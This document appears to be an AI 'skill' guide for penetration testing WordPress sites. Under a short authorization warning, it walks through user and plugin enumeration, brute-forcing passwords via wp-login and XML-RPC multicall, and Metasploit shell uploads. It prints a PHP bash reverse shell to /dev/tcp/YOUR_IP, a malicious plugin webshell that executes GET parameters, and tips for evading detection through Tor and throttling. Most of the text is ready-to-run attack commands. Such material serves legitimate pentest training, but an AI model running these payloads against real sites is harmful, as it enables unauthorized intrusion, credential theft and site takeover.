WordPress Penetration Testing

[!CAUTION]

⚠️ AUTHORIZATION REQUIRED - READ BEFORE PROCEEDING

This skill contains actual exploitation techniques and attack commands.

Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is:

• Illegal under computer fraud laws (CFAA, Computer Misuse Act, etc.)

• Punishable by fines and imprisonment

• Unethical and harmful to site owners

Before using this skill, you MUST have:

• Written authorization from the system owner

• Defined scope specifying which systems can be tested

• Rules of engagement document signed by both parties

• Emergency contact information for the system owner

• Insurance/liability coverage if testing professionally

If you do not have written authorization, STOP NOW.

Purpose

Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.

Prerequisites

Required Tools

• WPScan (pre-installed in Kali Linux)

• Metasploit Framework

• Burp Suite or OWASP ZAP

• Nmap for initial discovery

• cURL or wget

Required Knowledge

• WordPress architecture and structure

• Web application testing fundamentals

• HTTP protocol understanding

• Common web vulnerabilities (OWASP Top 10)

Outputs and Deliverables

• WordPress Enumeration Report - Version, themes, plugins, users

• Vulnerability Assessment - Identified CVEs and misconfigurations

• Credential Assessment - Weak password findings

• Exploitation Proof - Shell access documentation

Core Workflow

Phase 1: WordPress Discovery

Identify WordPress installations:

Check for WordPress indicators

curl -s http://target.com | grep -i wordpress curl -s http://target.com | grep -i "wp-content" curl -s http://target.com | grep -i "wp-includes"

Check common WordPress paths

curl -I http://target.com/wp-login.php curl -I http://target.com/wp-admin/ curl -I http://target.com/wp-content/ curl -I http://target.com/xmlrpc.php

Check meta generator tag

curl -s http://target.com | grep "generator"

Nmap WordPress detection

nmap -p 80,443 --script http-wordpress-enum target.com

Key WordPress files and directories:

• /wp-admin/

• Admin dashboard

• /wp-login.php

• Login page

• /wp-content/

• Themes, plugins, uploads

• /wp-includes/

• Core files

• /xmlrpc.php

• XML-RPC interface

• /wp-config.php

• Configuration (not accessible if secure)

• /readme.html

• Version information

Phase 2: Basic WPScan Enumeration

Comprehensive WordPress scanning with WPScan:

Basic scan

wpscan --url http://target.com/wordpress/

With API token (for vulnerability data)

wpscan --url http://target.com --api-token YOUR_API_TOKEN

Aggressive detection mode

wpscan --url http://target.com --detection-mode aggressive

Output to file

wpscan --url http://target.com -o results.txt

JSON output

wpscan --url http://target.com -f json -o results.json

Verbose output

wpscan --url http://target.com -v

Phase 3: WordPress Version Detection

Identify WordPress version:

WPScan version detection

wpscan --url http://target.com

Manual version checks

curl -s http://target.com/readme.html | grep -i version curl -s http://target.com/feed/ | grep -i generator curl -s http://target.com | grep "?ver="

Check meta generator

curl -s http://target.com | grep 'name="generator"'

Check RSS feeds

curl -s http://target.com/feed/ curl -s http://target.com/comments/feed/

Version sources:

• Meta generator tag in HTML

• readme.html file

• RSS/Atom feeds

• JavaScript/CSS file versions

Phase 4: Theme Enumeration

Identify installed themes:

Enumerate all themes

wpscan --url http://target.com -e at

Enumerate vulnerable themes only

wpscan --url http://target.com -e vt

Theme enumeration with detection mode

wpscan --url http://target.com -e at --plugins-detection aggressive

Manual theme detection

curl -s http://target.com | grep "wp-content/themes/" curl -s http://target.com/wp-content/themes/

Theme vulnerability checks:

Search for theme exploits

searchsploit wordpress theme <theme_name>

Check theme version

curl -s http://target.com/wp-content/themes/&#x3C;theme>/style.css | grep -i version curl -s http://target.com/wp-content/themes/&#x3C;theme>/readme.txt

Phase 5: Plugin Enumeration

Identify installed plugins:

Enumerate all plugins

wpscan --url http://target.com -e ap

Enumerate vulnerable plugins only

wpscan --url http://target.com -e vp

Aggressive plugin detection

wpscan --url http://target.com -e ap --plugins-detection aggressive

Mixed detection mode

wpscan --url http://target.com -e ap --plugins-detection mixed

Manual plugin discovery

curl -s http://target.com | grep "wp-content/plugins/" curl -s http://target.com/wp-content/plugins/

Common vulnerable plugins to check:

Search for plugin exploits

searchsploit wordpress plugin <plugin_name> searchsploit wordpress mail-masta searchsploit wordpress slideshow gallery searchsploit wordpress reflex gallery

Check plugin version

curl -s http://target.com/wp-content/plugins/&#x3C;plugin>/readme.txt

Phase 6: User Enumeration

Discover WordPress users:

WPScan user enumeration

wpscan --url http://target.com -e u

Enumerate specific number of users

wpscan --url http://target.com -e u1-100

Author ID enumeration (manual)

for i in {1..20}; do curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]*/' done

JSON API user enumeration (if enabled)

curl -s http://target.com/wp-json/wp/v2/users

REST API user enumeration

curl -s http://target.com/wp-json/wp/v2/users?per_page=100

Login error enumeration

curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php

Phase 7: Comprehensive Enumeration

Run all enumeration modules:

Enumerate everything

wpscan --url http://target.com -e at -e ap -e u

Alternative comprehensive scan

wpscan --url http://target.com -e vp,vt,u,cb,dbe

Enumeration flags:

at - All themes

vt - Vulnerable themes

ap - All plugins

vp - Vulnerable plugins

u - Users (1-10)

cb - Config backups

dbe - Database exports

Full aggressive enumeration

wpscan --url http://target.com -e at,ap,u,cb,dbe
--detection-mode aggressive
--plugins-detection aggressive

Phase 8: Password Attacks

Brute-force WordPress credentials:

Single user brute-force

wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt

Multiple users from file

wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt

With password attack threads

wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50

XML-RPC brute-force (faster, may bypass protection)

wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc

Brute-force with API limiting

wpscan --url http://target.com -U admin -P passwords.txt --throttle 500

Create targeted wordlist

cewl http://target.com -w wordlist.txt wpscan --url http://target.com -U admin -P wordlist.txt

Password attack methods:

• wp-login

• Standard login form

• xmlrpc

• XML-RPC multicall (faster)

• xmlrpc-multicall

• Multiple passwords per request

Phase 9: Vulnerability Exploitation

Metasploit Shell Upload

After obtaining credentials:

Start Metasploit

msfconsole

Admin shell upload

use exploit/unix/webapp/wp_admin_shell_upload set RHOSTS target.com set USERNAME admin set PASSWORD jessica set TARGETURI /wordpress set LHOST <your_ip> exploit

Plugin Exploitation

Slideshow Gallery exploit

use exploit/unix/webapp/wp_slideshowgallery_upload set RHOSTS target.com set TARGETURI /wordpress set USERNAME admin set PASSWORD jessica set LHOST <your_ip> exploit

Search for WordPress exploits

search type:exploit platform:php wordpress

Manual Exploitation

Theme/plugin editor (with admin access):

// Navigate to Appearance > Theme Editor // Edit 404.php or functions.php // Add PHP reverse shell:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>

// Or use weevely backdoor // Access via: http://target.com/wp-content/themes/theme_name/404.php

Plugin upload method:

Create malicious plugin

cat > malicious.php << 'EOF' <?php /* Plugin Name: Malicious Plugin Description: Security Testing Version: 1.0 */ if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?> EOF

Zip and upload via Plugins > Add New > Upload Plugin

zip malicious.zip malicious.php

Access webshell

curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"

Phase 10: Advanced Techniques

XML-RPC Exploitation

Check if XML-RPC is enabled

curl -X POST http://target.com/xmlrpc.php

List available methods

curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php

Brute-force via XML-RPC multicall

cat > xmlrpc_brute.xml << 'EOF' <?xml version="1.0"?> <methodCall> <methodName>system.multicall</methodName> <params> <param><value><array><data> <value><struct> <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member> <member><name>params</name><value><array><data> <value><string>admin</string></value> <value><string>password1</string></value> </data></array></value></member> </struct></value> <value><struct> <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member> <member><name>params</name><value><array><data> <value><string>admin</string></value> <value><string>password2</string></value> </data></array></value></member> </struct></value> </data></array></value></param> </params> </methodCall> EOF

curl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php

Scanning Through Proxy

Use Tor proxy

wpscan --url http://target.com --proxy socks5://127.0.0.1:9050

HTTP proxy

wpscan --url http://target.com --proxy http://127.0.0.1:8080

Burp Suite proxy

wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks

HTTP Authentication

Basic authentication

wpscan --url http://target.com --http-auth admin:password

Force SSL/TLS

wpscan --url https://target.com --disable-tls-checks

Quick Reference

WPScan Enumeration Flags

Flag Description

-e at

All themes

-e vt

Vulnerable themes

-e ap

All plugins

-e vp

Vulnerable plugins

-e u

Users (1-10)

-e cb

Config backups

-e dbe

Database exports

Common WordPress Paths

Path Purpose

/wp-admin/

Admin dashboard

/wp-login.php

Login page

/wp-content/uploads/

User uploads

/wp-includes/

Core files

/xmlrpc.php

XML-RPC API

/wp-json/

REST API

WPScan Command Examples

Purpose Command

Basic scan wpscan --url http://target.com

All enumeration wpscan --url http://target.com -e at,ap,u

Password attack wpscan --url http://target.com -U admin -P pass.txt

Aggressive wpscan --url http://target.com --detection-mode aggressive

Constraints and Limitations

Legal Considerations

• Obtain written authorization before testing

• Stay within defined scope

• Document all testing activities

• Follow responsible disclosure

Technical Limitations

• WAF may block scanning

• Rate limiting may prevent brute-force

• Some plugins may have false negatives

• XML-RPC may be disabled

Detection Evasion

• Use random user agents: --random-user-agent

• Throttle requests: --throttle 1000

• Use proxy rotation

• Avoid aggressive modes on monitored sites

Troubleshooting

WPScan Shows No Vulnerabilities

Solutions:

• Use API token for vulnerability database

• Try aggressive detection mode

• Check for WAF blocking scans

• Verify WordPress is actually installed

Brute-Force Blocked

Solutions:

• Use XML-RPC method instead of wp-login

• Add throttling: --throttle 500

• Use different user agents

• Check for IP blocking/fail2ban

Cannot Access Admin Panel

Solutions:

• Verify credentials are correct

• Check for two-factor authentication

• Look for IP whitelist restrictions

• Check for login URL changes (security plugins)